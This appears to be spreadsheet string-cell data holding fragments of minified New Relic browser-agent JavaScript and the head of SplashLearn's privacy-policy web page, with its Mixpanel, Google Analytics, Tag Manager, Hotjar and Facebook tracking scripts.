    <t>Dz],0),(0,c.p)("timing",["load",t],void 0,e. D.pageViewTiming,this.ee)}))}this.importAggregator()}}v=E,m="featureName",b=y.t9,(m=function(e){var t=function(e,t){if("object"!=typeof e||null===e)return e;var r=e[Symbol.toPrimitive];if(void 0!==r){var n=r.call(e,t||"default");if("object"!=typeof n)return n;throw new TypeError("@@toPrimitive must return a primitive value. ")}return("string"===t?String:Number)(e)}(e,"string");return"symbol"==typeof t?t:String(t)}(m))in v?Object.defineProperty(v,m,{value:b,enumerable:!0,configurable:!0,writable:!0}):v[m]=b;var A=i(9557),x=i(7022);class T extends A.w{constructor(e){super(e),this.aggregatedData={}}store(e,t,r,n,i){var o=this.getBucket(e,t,r,i);return o.metrics=function(e,t){t||(t={count:0});return t.count+=1,(0,x.</t>
  </si>
  <si>
    <t>D)(e,(function(e,r){t[e]=_(r,t[e])})),t}(n,o.metrics),o}merge(e,t,r,n,i){var o=this.getBucket(e,t,n,i);if(o.metrics){var a=o.metrics;a.count+=r.count,(0,x. D)(r,(function(e,t){if("count"!==e){var n=a[e],i=r[e];i&amp;&amp;!i.c?a[e]=_(i.t,n):a[e]=function(e,t){if(!t)return e;t.c||(t=S(t.t));return t.min=Math.min(e.min,t.min),t.max=Math.max(e.max,t.max),t.t+=e.t,t.sos+=e.sos,t.c+=e.c,t}(i,a[e])}}))}else o.metrics=r}storeMetric(e,t,r,n){var i=this.getBucket(e,t,r);return i.stats=_(n,i.stats),i}getBucket(e,t,r,n){this.aggregatedData[e]||(this.aggregatedData[e]={});var i=this.aggregatedData[e][t];return i||(i=this.aggregatedData[e][t]={params:r||{}},n&amp;&amp;(i.custom=n)),i}get(e,t){return t?this.aggregatedData[e]&amp;&amp;this.aggregatedData[e][t]:this.aggregatedData[e]}take(e){for(var t={},r="",n=!1,i=0;i&lt;e.length;i++)t[r=e[i]]=j(this.aggregatedData[r]),t[r].length&amp;&amp;(n=!0),delete this.aggregatedData[r];return n?t:null}}function _(e,t){return null==e?function(e){e?e.c++:e={c:1};return e}(t):t?(t.c||(t=S(t.t)),t.c+=1,t.t+=e,t.sos+=e*e,e&gt;t.max&amp;&amp;(t.max=e),e&lt;t.min&amp;&amp;(t.min=e),t):{t:e}}function S(e){return{t:e,min:e,max:e,sos:e*e,c:1}}function j(e){return"object"!=typeof e?[]:(0,x.</t>
  </si>
  <si>
    <t>D)(e,N)}function N(e,t){return t}var D=i(6797),O=i(5526),P=i(2438);var R=i(6998),C=i(8544),I=i(6382);class k extends p{constructor(e,r){let n=!(arguments.length&gt;2&amp;&amp;void 0!==arguments[2])||arguments[2];super(e,r,I.t,n),h.il&amp;&amp;((0,t. OP)(e).initHidden=Boolean("hidden"===document.visibilityState),(0,R.N)((()=&gt;(0,c.p)("docHidden",[(0,w.z)()],void 0,I.t,this.ee)),!0),(0,C.bP)("pagehide",(()=&gt;(0,c.p)("winPagehide",[(0,w.z)()],void 0,I.t,this.ee))),this.importAggregator())}}!function(e,t,r){(t=function(e){var t=function(e,t){if("object"!=typeof e||null===e)return e;var r=e[Symbol.toPrimitive];if(void 0!==r){var n=r.call(e,t||"default");if("object"!=typeof n)return n;throw new TypeError("@@toPrimitive must return a primitive value. ")}return("string"===t?String:Number)(e)}(e,"string");return"symbol"==typeof t?t:String(t)}(t))in e?Object.defineProperty(e,t,{value:r,enumerable:!0,configurable:!0,writable:!0}):e[t]=r}(k,"featureName",I.t);const H=Boolean(h._A?.Worker),L=Boolean(h._A?.SharedWorker),z=Boolean(h._A?.navigator?.serviceWorker);let M,B,F;var</t>
  </si>
  <si>
    <t>U=i(6034);class W extends p{constructor(t,r){let n=!(arguments.length&gt;2&amp;&amp;void 0!==arguments[2])||arguments[2];super(t,r,U.t9,n),function(e){if(!M){if(H){M=Worker;try{h._A.Worker=r(M,"Dedicated")}catch(e){o(e,"Dedicated")}if(L){B=SharedWorker;try{h._A.SharedWorker=r(B,"Shared")}catch(e){o(e,"Shared")}}else n("Shared");if(z){F=navigator.serviceWorker.register;try{h._A.navigator.serviceWorker.register=(t=F,function(){for(var e=arguments.length,r=new Array(e),n=0;n&lt;e;n++)r[n]=arguments[n];return i("Service",r[1]?.type),t.apply(navigator.serviceWorker,r)})}catch(e){o(e,"Service")}}else n("Service");var t;return}n("All")}function r(e,t){return"undefined"==typeof Proxy?e:new Proxy(e,{construct:(e,r)=&gt;(i(t,r[1]?.type),new e(...r))})}function n(t){h.v6||e("Workers/".concat(t,"/Unavailable"))}function i(t,r){e("Workers/".concat(t,"module"===r?"/Module":"/Classic"))}function o(t,r){e("Workers/".concat(r,"/SM/Unsupported")),(0,g. Z)("NR Agent: Unable to capture ".concat(r," workers."),t)}}((t=&gt;(0,c.p)(U.xS,[t],void 0,e.</t>
  </si>
  <si>
    <t>D.metrics,this.ee))),this.importAggregator()}}!function(e,t,r){(t=function(e){var t=function(e,t){if("object"!=typeof e||null===e)return e;var r=e[Symbol.toPrimitive];if(void 0!==r){var n=r.call(e,t||"default");if("object"!=typeof n)return n;throw new TypeError("@@toPrimitive must return a primitive value. ")}return("string"===t?String:Number)(e)}(e,"string");return"symbol"==typeof t?t:String(t)}(t))in e?Object.defineProperty(e,t,{value:r,enumerable:!0,configurable:!0,writable:!0}):e[t]=r}(W,"featureName",U.t9);var q=i(3916),G=i(3752),V=i(8683),X=i.n(V);const $="nr@original";var Z=Object.prototype.hasOwnProperty,Y=!1;function Q(e,t){return e||(e=G.ee),r.inPlace=function(e,t,n,i,o){n||(n="");var a,s,c,u="-"===n.charAt(0);for(c=0;c&lt;t.length;c++)ee(a=e[s=t[c]])||(e[s]=r(a,u?s+n:n,i,s,o))},r.flag=$,r;function r(t,r,i,o,a){return ee(t)?t:(r||(r=""),nrWrapper[$]=t,K(t,nrWrapper,e),nrWrapper);function nrWrapper(){var s,c,u,f;try{c=this,s=X()(arguments),u="function"==typeof i?i(s,c):i||{}}catch(t){J([t,"",[s,c,o],u],e)}n(r+"start",[s,c,o],u,a);try{return f=t.apply(c,s)}catch(e){throw n(r+"err",[s,c,e],u,a),e}finally{n(r+"end",[s,c,f],u,a)}}}function n(r,n,i,o){if(!Y||t){var a=Y;Y=!0;try{e.emit(r,n,i,t,o)}catch(t){J([t,r,n,i],e)}Y=a}}}function J(e,t){t||(t=G.ee);try{t.emit("internal-error",e)}catch(e){}}function K(e,t,r){if(Object.defineProperty&amp;&amp;Object.keys)try{return Object.keys(e).forEach((function(r){Object.defineProperty(t,r,{get:function(){return e[r]},set:function(t){return e[r]=t,t}})})),t}catch(e){J([e],r)}for(var n in e)Z.call(e,n)&amp;&amp;(t[n]=e[n]);return t}function ee(e){return!(e&amp;&amp;e instanceof Function&amp;&amp;e.apply&amp;&amp;!e[$])}var te="fetch-",re=te+"body-",ne=["arrayBuffer","blob","json","text","formData"],ie=h._A.Request,oe=h._A.Response,ae="prototype",se="nr@context";const ce={};function ue(e){const t=function(e){return(e||G.ee).get("fetch")}(e);if(!(ie&amp;&amp;oe&amp;&amp;h._A.fetch))return t;if(ce[t.debugId]++)return t;function r(e,r,n){var i=e[r];"function"==typeof i&amp;&amp;(e[r]=function(){var e,r=X()(arguments),o={};t.emit(n+"before-start",[r],o),o[se]&amp;&amp;o[se].dt&amp;&amp;(e=o[se].dt);var a=i.apply(this,r);return t.emit(n+"start",[r,e],a),a.then((function(e){return t.emit(n+"end",[null,e],a),e}),(function(e){throw t.emit(n+"end",[e],a),e}))},e[r][$]=i)}return ce[t.debugId]=1,ne.forEach((e=&gt;{r(ie[ae],e,re),r(oe[ae],e,re)})),r(h._A,"fetch",te),t.on(te+"end",(function(e,r){var n=this;if(r){var i=r.headers.get("content-length");null!==i&amp;&amp;(n.rxSize=i),t.emit(te+"done",[null,r],n)}else t.emit(te+"done",[e],n)})),t}const fe={},de="setTimeout",le="setInterval",he="clearTimeout",ge="-start",pe=[de,"setImmediate",le,he,"clearImmediate"];function ve(e){const t=function(e){return(e||G.ee).get("timer")}(e);if(fe[t.debugId]++)return t;fe[t.debugId]=1;var r=Q(t);return r.inPlace(h._A,pe.slice(0,2),de+"-"),r.inPlace(h._A,pe.slice(2,3),le+"-"),r.inPlace(h._A,pe.slice(3),he+"-"),t.on(le+ge,(function(e,t,n){e[0]=r(e[0],"fn-",null,n)})),t.on(de+ge,(function(e,t,n){this.method=n,this.timerDuration=isNaN(e[1])?0:+e[1],e[0]=r(e[0],"fn-",this,n)})),t}const me={};function be(e){const t=function(e){return(e||G.ee).get("raf")}(e);if(!h.il||me[t.debugId]++)return t;me[t.debugId]=1;var r=Q(t);return r.inPlace(window,["requestAnimationFrame"],"raf-"),t.on("raf-start",(function(e){e[0]=r(e[0],"fn-")})),t}const ye={},we=["pushState","replaceState"];function Ee(e){const t=function(e){return(e||G.ee).get("history")}(e);return!h.il||ye[t.debugId]++||(ye[t.debugId]=1,Q(t).inPlace(window.history,we,"-")),t}const Ae={},xe=["appendChild","insertBefore","replaceChild"];function Te(e){const t=function(e){return(e||G.ee).get("jsonp")}(e);if(!h.il||Ae[t.debugId])return t;Ae[t.debugId]=!0;var r=Q(t),n=/[?&amp;](?:callback|cb)=([^&amp;#]+)/,i=/(.*)\.([^.]+)/,o=/^(\w+)(\.|$)(.*)$/;function a(e,t){var r=e.match(o),n=r[1],i=r[3];return i?a(i,t[n]):t[n]}return r.inPlace(Node.prototype,xe,"dom-"),t.on("dom-start",(function(e){!function(e){if(!e||"string"!=typeof e.nodeName||"script"!==e.nodeName.toLowerCase())return;if("function"!=typeof e.addEventListener)return;var o=(s=e.src,c=s.match(n),c?c[1]:null);var s,c;if(!o)return;var u=function(e){var t=e.match(i);if(t&amp;&amp;t.length&gt;=3)return{key:t[2],parent:a(t[1],window)};return{key:e,parent:window}}(o);if("function"!=typeof u.parent[u.key])return;var f={};function d(){t.emit("jsonp-end",[],f),e.removeEventListener("load",d,(0,C.m$)(!1)),e.removeEventListener("error",l,(0,C.m$)(!1))}function l(){t.emit("jsonp-error",[],f),t.emit("jsonp-end",[],f),e.removeEventListener("l</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE HTML&gt;&lt;!--[if lt IE 7 ]&gt; &lt;html class="ie6 js-old-browser-html"&gt; &lt;! [endif]--&gt;&lt;!--[if IE 7 ]&gt;    &lt;html class="ie7 js-old-browser-html"&gt; &lt;! [endif]--&gt;&lt;!--[if IE 8 ]&gt;    &lt;html class="ie8 js-old-browser-html"&gt; &lt;!</t>
  </si>
  <si>
    <t>[endif]--&gt;&lt;!--[if IE 9 ]&gt;    &lt;html class="ie9"&gt; &lt;! [endif]--&gt;&lt;!--[if (gt IE 9)|!(IE)]&gt;&lt;!--&gt; &lt;html class="no-js responsv"&gt; &lt;!--&lt;![endif]--&gt;&lt;head&gt; &lt;link rel="stylesheet" href="https://use.typekit.net/edk0gem.css"&gt;
&lt;script src="https://accounts.google.com/gsi/client" type="text/javascript"&gt;&lt;/script&gt;&lt;title&gt;Privacy Policy&lt;/title&gt;&lt;meta content="width=device-width, initial-scale=1, minimum-scale=1,maximum-scale=1, user-scalable=no" id="" name="viewport" /&gt;&lt;meta</t>
  </si>
  <si>
    <t>content="https://www.facebook.com/splashlearnofficial" property="article:publisher" /&gt;&lt;script src="https://cdn.splashmath.com/assets/utils/web-util-122a9856ddb865eb3443fb01a089ce1eac96636e0dcb278b1da3ebf6f4ccb1ac.js"&gt;&lt;/script&gt;
&lt;script type="text/javascript"&gt;
    var show_banner = (isMobileDevice() &amp;&amp; isIOSorMacDevice()) || isIpadDevice();
    var  hide_in_korea_page = document.</t>
  </si>
  <si>
    <t>URL.includes('signin/mathmaster_korea');
    if(hide_in_korea_page){
        show_banner = !hide_in_korea_page
    }
    show_banner &amp;&amp; addMetaTag( "apple-itunes-app", "app-id=672658828, affiliate-data='at=10lbPy', app-argument=myURL");
  &lt;/script&gt;
&lt;meta name="google" content="notranslate" /&gt;
&lt;meta name="twitter:card" content="summary_large_image"&gt;
&lt;meta name="twitter:site" content="@splashmath"&gt;
&lt;meta name="twitter:title" content="SplashLearn - Fun Math Practice Games for Kindergarten to 5th Grade" /&gt;
&lt;meta name="twitter:description" content="SplashLearn is an award winning math learning program used by more than 40 Million kids for fun math practice. It includes unlimited math lessons on number counting, addition, subtraction etc."&gt;
&lt;meta name="twitter:image:src" content="https://cdn.splashmath.com/assets/twitter-card-images/fb-twitter-logo-ade7b594e2d6d412e63ebf49e553c4fe1f3c7889b19aca7ea8618e38f1ab0b6a.jpg?"&gt;
&lt;meta name="twitter:app:name:ipad" content="SplashLearn - Grades 1 to 5 App"&gt;
&lt;meta name="twitter:app:url:ipad" content="smunol://"&gt;
&lt;meta name="twitter:app:id:ipad" content="id672658828"&gt;
&lt;meta property="twitter:account_id" content="4503599627598101" /&gt;
&lt;script src="https://cdn.splashmath.com/assets/react-sd-manifest-1678165689.js"&gt;&lt;/script&gt;&lt;script src="https://cdn.splashmath.com/assets/loggedout-a6020c68fea47870519abf6655536c29ed3074b68b094f8b309cce0de6bcbfb0.js" data-turbolinks-track="{}"&gt;&lt;/script&gt;&lt;script src="https://cdn.splashmath.com/assets/site_wide_common-57e11a3b25655bb4fb7f385310de35b5ba4321798671e3215eaf5fe48bcc4879.js" data-turbolinks-track="{}"&gt;&lt;/script&gt;&lt;link rel="stylesheet" media="screen" href="https://cdn.splashmath.com/assets/loggedout-9c38deada8fae802d00dc7dab86c33e87ce2ee393f54ed2610c4d44873145be8.css" debug="false" /&gt;
&lt;!--[if lte IE 9]&gt;
&lt;link rel="stylesheet" media="screen" href="https://cdn.splashmath.com/assets/loggedout_split2-16f0d2c7cff669f308f5754fd79cbd79b933ed05c2a0946dff42ec661db99490.css" debug="false" /&gt;
&lt;link rel="stylesheet" media="screen" href="https://cdn.splashmath.com/assets/loggedout_split3-c1a82bb38fc76b7160ff6a1df501c0a114f736cc3bd5f84570594da473c867ae.css" debug="false" /&gt;
&lt;link rel="stylesheet" media="screen" href="https://cdn.splashmath.com/assets/loggedout_split4-e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855.css" debug="false" /&gt;
&lt;! [endif]--&gt;&lt;link href='https://fonts.googleapis.com/css?family=Signika:400,300,600,700|Roboto+Condensed:300,400|Open+Sans:300,400,600,700,800|Montserrat:400,700|Khula:400,300,600,700|Work+Sans:300,400,500,600|Quicksand:300,400,500,700|Roboto:300,400,500|Roboto+Mono:700|Overlock:400,700,900&amp;display=swap' rel='stylesheet' type='text/css'&gt;
&lt;script&gt;
window.onerror = null
&lt;/script&gt;
&lt;script type="text/javascript"&gt;
    (function(e,b){if(!b.__SV){var a,f,i,g;window.mixpanel=b;a=e.createElement("script");a.type="text/javascript";a.async=!0;a.src='https://cdn.mxpnl.com/libs/mixpanel-2.2.min.js';f=e.getElementsByTagName("script")[0];f.parentNode.insertBefore(a,f);b._i=[];b.init=function(a,e,d){function f(b,h){var a=h.split(".</t>
  </si>
  <si>
    <t>");2==a.length&amp;&amp;(b =b[a[0]],h=a[1]);b[h]=function(){b.push([h].concat(Array.prototype.slice.call(arguments,0)))}}var c=b;"undefined"!==
    typeof d?c=b[d]=[]:d="mixpanel";c.people=c.people||[];c.toString=function(b){var a="mixpanel";"mixpanel"!==d&amp;&amp;(a+=". "+d);b||(a+=" (stub)");return a};c.people.toString=function(){return c.toString(1)+".people (stub)"};i="disable track track_pageview track_links track_forms register register_once alias unregister identify name_tag set_config people.set people.set_once people.increment people.append people.track_charge people.clear_charges people.delete_user".split(" ");for(g=0;g&lt;i.length;g++)f(c,i[g]);
      b._i.push([a,e,d])};b.__SV=1.2}})(document,window.mixpanel||[]);
    function getMixpanelInstance(trackerId){
      if(mixpanel[trackerId] !</t>
  </si>
  <si>
    <t>we are using one session variable and one client side window variable to identify if the event has already been sent.
   //The session variable ensures the event is triggered only on the 1st server request and the window variable ensures
  //the event is sent only on first call to this method.
   function trackLandedOnWebsite(){
    var sendLandedEvent = true;
    if( sendLandedEvent &amp;&amp; (typeof window.jsSentLandedEvent === 'undefined') ){
      trackAnalyticsEvent('Landed on Website', null, false, function(){
        console.log("Resetting variable");
        $.post(
          '/user/user_properties/reset_landed_website_event_flag'
        );
        window.jsSentLandedEvent = 1;
      });
    }
  }
  //</t>
  </si>
  <si>
    <t xml:space="preserve">The code has been modified to track page view events of mixpanel for js and html requests.
   function trackPageLoadEvents() {
    if( $('#mixpanel-tracking-page-view').length == 0) {
      return;
    }
    // This function is used to track the explicit page load like 'Landed on Website' event *importantly* before the regular ones like 'Visited Home Page'.
    </t>
  </si>
  <si>
    <t>trackLandedOnWebsite();
    if( $('#mixpanel-tracking-page-view_for_unsupported_browser').length ! = 0) {
      trackPageLoadEventForEachObject('#mixpanel-tracking-page-view_for_unsupported_browser')
    }else {
      trackPageLoadEventForEachObject('#mixpanel-tracking-page-view');
    }
  }
  function trackPageLoadEventForEachObject(object_id) {
    var _event = {};
    _event.name = 'Visited '</t>
  </si>
  <si>
    <t>+ $(object_id).attr('data-name')
    properties_object = JSON.parse($(object_id).attr('data-properties'));
    _event.properties = {};
    if(properties_object ! = null)
    {
      Object.keys(properties_object).forEach(function(key){
        _event.properties[key] = properties_object[key];
      });
    }
    trackAnalyticsEvent(_event.name, _event.properties)
  }
  function trackServerEventToFacebook(eventKey){
    //If the user has disabled sending data to facebook
    try {
      $.ajax({
        url: '/user_events/metadata_for_action.json',
        type: 'post',
        data: {
          event_key: eventKey
        },
        success: function(data){
          // data should be list of events for the eventKey - most of the cases length will be 1.
          try {
            data.map(function(event){
              if(typeof(fbq)!='undefined'){
                fbq('trackCustom', event.name, event.properties);
              }
            });
          } catch(err) {
            console.log(err)
          }
          console.info(data);
        },
        error: function(a, b){
          console.warn(a.statusText);
        }
      });
    }
    catch (error) {
      e = error;
      return console &amp;&amp; console.warn(e);
    }
  }
  function trackTransactionEventToGtm(eventKey){
      return;
    try {
      $.ajax({
        url: '/user_events/metadata_for_action.json',
        type: 'post',
        data: {
          event_key: eventKey
        },
        success: function(data){
          // data should be list of events for the eventKey - most of the cases length will be 1.
          try {
            data.map(function(event){
              if(event.name === 'Transaction')
              {
                  trackToGtm(dataLayer, 'Paid Parent', 'Paid Parent', {revenue : event.properties.payment_after_discount});
              }
            });
          } catch(err) {
            console.log(err)
          }
        },
        error: function(a, b){
          console.warn(a.statusText);
        }
      });
    }
    catch (error) {
      e = error;
      return console &amp;&amp; console.warn(e);
    }
  }
  function getAbTestInfo(){
    var info = null;
    return info;
  }
  function trackToGtm(dataLayer, eventName, category, properties = { revenue: 0 }){
    //If the user has disabled sending data to bing
    if(typeof(dataLayer)!= 'undefined'){
      console.info('GTM EVENT DISPATCHED');
      console.info(eventName);
      dataLayer.push({'event' :</t>
  </si>
  <si>
    <t xml:space="preserve">eventName, 'category' : category, 'ecomm_totalvalue': properties.revenue});
      return dataLayer;
    }
  }
  function trackEventOnFacebook(event, properties){
    //If the user has disabled sending data to bing
    if(typeof(fbq)!='undefined'){
      console.info('FACEBOOK EVENT DISPATCHED');
      console.info(event);
      fbq('trackCustom', event, properties);
    }
  }
  // Category = event
  // Action = properties
  // Label = label
  function trackEventOnGA(category, action, label, fieldsObject){
    //If the user has disabled sending data to bing
    if(typeof(ga)!='undefined'){
      console.info('GA EVENT DISPATCHED');
      console.info(category, action, label);
      ga('send', 'event', category, action, label, fieldsObject);
    }
  }
  function trackPageViewOnGa(page, properties){
    //If the user has disabled sending data to bing
    if(typeof(ga)!='undefined'){
      console.group('GA PAGEVIEW EVENT DISPATCHED')
      console.info(page)
      console.info(properties)
      console.groupEnd()
      ga('send', 'pageview', page, properties);
    }
  }
  function trackPageViewOnFb(){
    //If the user has disabled sending data to bing
    if(typeof(fbq)!='undefined'){
      fbq('track', 'PageView');
    }
  }
  function trackServerSide(_event, properties, callbackMethod, onlyCleverTap) {
    try {
      var data = {event: _event, properties: properties, only_mixpanel: true};
      if(onlyCleverTap === true){
        data.only_mixpanel = false;
        data.only_clevertap = true;
      }
      $.ajax({
        type: 'POST',
        url: '/user-events/track',
        data: JSON.stringify(data),
        contentType: 'application/json; charset=utf-8',
        success: callbackMethod
      });
      console.group('EVENT DISPATCHED (server-side)')
      console.info(_event)
      console.info(properties)
      console.groupEnd()
    } catch(e) {
      console.log('SOMETHING WENT WRONG -- trackServerSide');
    }
  }
  function checkIsWebView() {
    var cookiesList = document.cookie.split(';');
    if(cookiesList.length &gt; 0) {
      var index = cookiesList.findIndex(x =&gt; x.includes('web_view'));
      if(index ! == -1) {
        console.log('cookies found at index', index);
        return true;
      } else {
        return false;
      }
    }
    return false;
  }
  function getAppConfig() {
    var appConfig = localStorage.getItem('appDeviceConfig');
    if(appConfig) {
      return JSON.parse(appConfig);
    }
    return null;
  }
  /*
    Always call this function only for tracking events
    For Reactive pages : Refer SP.utils.tracker.trackEvent
  */
  function trackAnalyticsEvent(_event, properties, sendGA, callbackMethod) {
    properties = properties || {};
    // properties = {..., @user_analytics_id};
    var blacklisted_events = ["Viewed MP Game Invites Drawer", "Coloring Book Drawing Started", "Sound Started", "Sound Finished", "Interacted MP Invite Friends Screen", "Recommendation Item Generated", "Clicked Username on class signin popup", "Clicked Back button on class signin popup", "Clicked Back button on parent signin popup", "Clicked Back button on student signin Clicked Clicked Clever Signup", "Clicked Clicked Google Signup", "User agent info", "Error 404", "Activity Interacted"];
    </t>
  </si>
  <si>
    <t xml:space="preserve">if (blacklisted_events) {
      window.mixpanel_blacklisted_events = blacklisted_events
      if(window.mixpanel_blacklisted_events.indexOf(_event) ! = -1) {
        return;
      }
    }
    var shouldTrackMetaSessionEvent = false;
    var userType = "guest"
    if (userType ! == 'guest' &amp;&amp; shouldTrackMetaSessionEvent) {
      apiCallerAnalyticsService(_event, properties)
    }
    </t>
  </si>
  <si>
    <t>if(sendGA || ['Visited Signup Screen', 'Account Type Screen Shown', 'Clicked Signup', 'Clicked Signup Popup', 'Clicked Login', 'Visited Parent Landing'].indexOf(_event)&gt;=0 ){
      try {
        trackEventOnFacebook(_event, properties);
        trackEventOnGA(_event, JSON.stringify(properties));
      }catch(e){
        console.log('Failed to send events on ga/fb');
      }
    }
    if(_event == 'Visited Product Purchase Form') {
      var action = properties['Product'];
      trackEventOnGA(_event, action);
    }
    if (_event == 'parent product events') {
      var actionGA = properties['action'];
      var labelGA = properties['label'];
      trackEventOnGA(_event, actionGA, labelGA);
    }
    if(_event == "Playable Started" || "Playable Clicked") {
      var action = properties['Product'];
      var signup_flow = ""
      var props = {
       action: action
      }
      props["Signup Flow"] = signup_flow;
      trackEventOnGA(_event, JSON.stringify(props));
   }
    if(properties.trackServerSide === true) {
      delete properties.trackServerSide; // removes trackServerSide key from properties object
      trackServerSide(_event, properties, callbackMethod);
      return;
    }
    if(typeof(mixpanel)=='undefined'){
      if(callbackMethod &amp;&amp; typeof(callbackMethod)=="function"){
        try{
         callbackMethod();
        } catch(e) {
          console.log('SOMETHING WENT WRONG -- 5');
        }
      }
      return;
    }
    properties["Platform"]  = 'web';
    var appConfigInfo = getAppConfig();
    if(checkIsWebView() &amp;&amp; appConfigInfo) {
      properties = {...properties, ...appConfigInfo};
      console.log('these are the added properties', appConfigInfo);
    }
    try {
      console.group('EVENT DISPATCHED')
      console.info(_event)
      console.info(properties)
      console.groupEnd()
    } catch(e) {
      console.log('SOMETHING WENT WRONG -- 2');
    }
      if(callbackMethod &amp;&amp; typeof(callbackMethod)=="function"){
        try{
         callbackMethod();
        } catch(e) {
          console.log('SOMETHING WENT WRONG -- 4');
        }
       }
  }
  function apiCallerAnalyticsService(_event, properties) {
    try{
      var session_id = "";
      var time_in_utc = new Date().toISOString();
      var params = {
        'analytics_id': 'F5425DDF5E394350B21142DA11CE56CE',
        'event_name': _event,
        'properties': JSON.stringify(properties),
        'session_id': session_id,
        'event_time': time_in_utc
      }
      const headers = {
        "content-type": "application/json"
      };
      var url = "https://www.splashlearn.com/analytics-service/meta_session_events/track";
      let credValue = "include";
      fetch(url, {
        method: 'POST',
        headers: headers,
        credentials: credValue,
        mode: 'cors',
        body: JSON.stringify(params),
      })
      .then(response =&gt; response.json())
      .then(data</t>
  </si>
  <si>
    <t>Assigned","Visited Add Students Details","Product Purchased","Playable Started","Viewed Assignment Successfully Assigned Page","Session Started","Student Almost Won SpringBoard Certificate","Interacted Cancellation Screen","Reached Daily Limit","Viewed SplashCommunity Discoverability Pop-Up","Credit Card Submitted Correctly","Teacher Signup","Signup Successful","Visited Plan Purchase Combined Page","Class Almost Won SpringBoard Certificate","Clicked on Autologin via Clevertap Campaign","Viewed MF Successfully Assigned Page","Interacted Worksheet Listing Page","Student Won SpringBoard Certificate","Apple Subscription Cancelled","Class Won SpringBoard Certificate","Cancellation</t>
  </si>
  <si>
    <t>Complete","Interacted Grade Selection","Visited Teacher Dashboard","Subject Selected","Grade Select Page","Viewed Purchase Page","Successfully Autologin via Clevertap Campaign","Email Verified"];
    if(AllowedEvents.indexOf(event) !</t>
  </si>
  <si>
    <t>[];
&lt;/script&gt;
&lt;script&gt;
    (function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
    new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
     j=d.createElement(s),dl=l!='dataLayer'?'&amp;l='+l:'';j.async=true;j.src=
    'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
    })(window,document,'script','dataLayer', 'GTM-TZ8KPCX');
  &lt;/script&gt;
&lt;script type="text/javascript"&gt;
      (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
        (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
        m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
      })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
      ga('create', "UA-22896793-2", 'auto', {'allowLinker': true}, {
        'cookieExpires': 60 * 60 * 24 * 365 }, { 'useAmpClientId': true }
        );
      ga('require', 'linker');
      var autoLinkDomains =</t>
  </si>
  <si>
    <t>[];
        if(location.hostname.search('splashmath') ! = -1)
           autoLinkDomains =</t>
  </si>
  <si>
    <t xml:space="preserve">['splashlearn.com'];
        else
          autoLinkDomains = ['splashmath.com'];
      ga('linker:autoLink', autoLinkDomains);
      ga('require', 'linkid');
      ga('require', 'ecommerce');
      ga('set', 'anonymizeIp', true);
      ga('set', 'allowAdFeatures', false);
      // dimension1 = User Type
        ga('set', 'dimension1', "Guest");
      // dimension2 = Product Type
        ga('set', 'dimension2', "Guest Edition");
      // dimension3 = Product Subscription
      // dimension4 = User Id
      // dimension5 = Signup Flow
      ga('send', 'pageview');
      var existingClientId = "";
      ga(function(tracker) {
        var clientId = tracker.get('clientId');
        if(existingClientId ! = clientId){
          $.post(
            '/user/user_properties',
            {client_id: clientId}
          );
        }
      });
  &lt;/script&gt;
&lt;meta name="csrf-param" content="authenticity_token" /&gt;
&lt;meta name="csrf-token" content="fL8eBKGCjEDNGSlEsuqYQX+xTZPz3pTuhNgs0iJwOIqqvzMewCK9g0sTw3qg2DExcXuj6UKA1ShWVJp/NhqzLA==" /&gt;&lt;link href="/favicon.ico" rel="shortcut icon" type="image/vnd.microsoft.icon" /&gt;&lt;script&gt;
  (function(h,o,t,j,a,r){
  h.hj=h.hj||function()
  {(h.hj.q=h.hj.q||[]).push(arguments)}
  ;
  </t>
  </si>
  <si>
    <t>h._hjSettings=
  {hjid:813615,hjsv:6}
  ;
  a=o.getElementsByTagName('head')[0];
  r=o.createElement('script');r.async=1;
  r.src=t+h._hjSettings.hjid+j+h._hjSettings.hjsv;
  a.appendChild(r);
  })(window,document,'https://static.hotjar.com/c/hotjar-','.js?sv=');
  var userId = 813615 || null;
&lt;/script&gt;
&lt;script&gt;if (window.location ! = window.top.location) {
  $('&lt;div class="ajax_spinner"&gt;').appendTo('body').css('background-color', 'white').show()
  setTimeout(function() { window.top.location = window.location; }, 0)
}&lt;/script&gt;
&lt;link rel="canonical" href="https://www.splashlearn.com/privacy" /&gt;
&lt;script&gt;$(document).ready(function(){
  if (document.documentMode === 10){
    document.documentElement.className += ' ie10';
  }
  if (document.documentMode === 11){
    document.documentElement.className += ' ie11';
  }
});&lt;/script&gt;&lt;/head&gt;&lt;body class="  handling-noty-error"&gt; &lt;noscript&gt;
    &lt;iframe src="https://www.googletagmanager.com/ns.html?id=GTM-TZ8KPCX" height="0" width="0" style="display:none;visibility:hidden"&gt;
    &lt;/iframe&gt;
  &lt;/noscript&gt;
&lt;div class="js-holder" id="holder"&gt;&lt;div class="header v5-header header-desktop"&gt;&lt;div class="header-container"&gt;&lt;a class="splashlearn-logo" href="/"&gt;&lt;img alt="SplashLearn Logo" class="splashlearn-logo" src="https://cdn.splashmath.com/assets/home/v5/logo-a26c535e83d56f82115a35713fd8c41179a928c83b9cef3bac76e9dc28c27c02.png" /&gt;&lt;/a&gt;&lt;div class="nav-items-wrapper" id="nav-items"&gt;&lt;div class="nav-link"&gt;&lt;a href="/" class="font-header"&gt;Parents&lt;/a&gt;&lt;/div&gt;&lt;div class="nav-link dropdown pd-r-32"&gt;&lt;div class="dropbtn"&gt;Educators&lt;/div&gt;&lt;span class="arrow-desktop"&gt;&lt;/span&gt;&lt;div class="dropdown-content"&gt;&lt;ul class="font-header js-header-dropdown-list"&gt;&lt;a href="/features/teachers"&gt;Teacher&lt;/a&gt;&lt;a href="/administrators"&gt;Administrator&lt;/a&gt;&lt;a href="/how-to-videos-for-teachers"&gt;Teacher How To's&lt;/a&gt;&lt;a href="https://support.splashlearn.com/hc/en-us/categories/360002524794-Teachers"&gt;Support&lt;/a&gt;&lt;/ul&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="nav-link dropdown 